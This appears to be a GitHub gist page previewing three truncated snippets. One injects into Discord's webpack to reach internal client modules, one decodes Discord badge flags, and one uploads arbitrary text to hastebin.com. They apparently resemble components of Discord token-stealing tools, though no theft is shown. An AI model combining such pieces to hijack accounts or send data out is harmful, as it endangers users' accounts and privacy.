This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function LogOut(){ | |
var req = webpackJsonp.push([ | |
[], { | |
extra_id: (e, t, r) => e.exports = r | |
}, | |
[ | |
["extra_id"] | |
] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function GetBadges(flags) | |
{ | |
const Discord_Employee = 1; | |
const Partnered_Server_Owner = 2; | |
const HypeSquad_Events = 4; | |
const Bug_Hunter_Level_1 = 8; | |
const House_Bravery = 64; | |
const House_Brilliance = 128; | |
const House_Balance = 256; | |
const Early_Supporter = 512; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public class Hastebin | |
{ | |
public static string CreateHaste(string value) | |
{ | |
WebClient | |
client = new WebClient(); | |
string bruh = client.UploadString("http://hastebin.com/documents", value); | |
return "http://hastebin.com/" + bruh.Replace(@"\", "").Replace("/", "").Replace("key", "").Replace("{", "").Replace("}", "").Replace("\"", ""); | |
} | |
} |